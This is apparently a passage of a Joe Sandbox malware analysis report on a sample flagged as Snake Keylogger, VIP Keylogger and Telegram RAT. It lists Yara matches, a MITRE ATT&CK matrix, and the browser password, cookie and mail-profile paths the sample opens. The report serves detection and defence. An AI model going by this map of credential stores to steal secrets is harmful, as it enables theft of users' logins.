Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Users\user\AppData\Roaming\HURBBASu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Users\user\AppData\Roaming\HURBBASu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.3928992900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3929285502.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3928992900.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3929285502.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SNKO05B241100201.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SNKO05B241100201.exe PID: 5096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HURBBASu.exe PID: 3676, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SNKO05B241100201.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HURBBASu.exe PID: 3676, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3926594506.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SNKO05B241100201.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SNKO05B241100201.exe PID: 5096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HURBBASu.exe PID: 3676, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.3928992900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3929285502.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3928992900.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3929285502.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SNKO05B241100201.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SNKO05B241100201.exe PID: 5096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HURBBASu.exe PID: 3676, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SNKO05B241100201.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HURBBASu.exe PID: 3676, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	31 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SNKO05B241100201.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SNKO05B241100201.exe